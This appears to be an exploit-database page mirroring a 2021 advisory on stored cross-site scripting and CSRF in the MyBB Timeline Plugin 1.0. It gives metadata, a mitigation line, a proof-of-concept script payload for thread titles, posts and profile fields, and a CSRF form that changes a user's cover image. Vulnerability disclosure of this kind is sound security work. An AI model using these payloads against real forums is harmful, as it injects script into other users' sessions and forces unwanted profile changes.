header-logo
Suggest Exploit
vendor:
MyBB Timeline Plugin
by:
0xB9
7.5
CVSS
HIGH
Cross-Site Scripting / CSRF
79
CWE
Product Name: MyBB Timeline Plugin
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mybb:mybb_timeline_plugin:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2021

MyBB Timeline Plugin 1.0 – Cross-Site Scripting / CSRF

MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the users timeline banner/image to be changed. Proof of Concept: XSS via Thread/Post: Make a new thread or reply to an existing thread and input a payload in either the thread title or main post itself. XSS via Location/Bio: Go to User CP -> Edit Profile and input a payload in the Location/Bio. CSRF: A form with an input field for the image URL and a hidden input field for the action.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

# Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
# Date: 1/21/2021
# Author: 0xB9
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1428
# Version: 1.0
# Tested on: Windows 10

1. Description:
MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the users timeline banner/image to be changed.
 

2. Proof of Concept:

~ XSS via Thread/Post ~
- Make a new thread or reply to an existing thread
- Input a payload in either the thread title or main post itself   <script>alert('XSS')</script>
Payload will execute when visiting your profile.

~ XSS via Location/Bio ~
- Go to User CP -> Edit Profile
- Input a payload in the Location/Bio   <script>alert('XSS')</script>
Payload will execute when visiting your profile.

~ CSRF ~
<form class="coverpicForm" action="http://localhost/mybb/timeline.php?action=profile&uid=1" style="display: block;">
	<input type="text" name="coverpic" placeholder="Add Image URL" required="">
	<input type="hidden" name="do_coverpic" value="change">
	<input type="submit" value="Change">
</form>

Navigation

Suggest Exploit

Services By CQR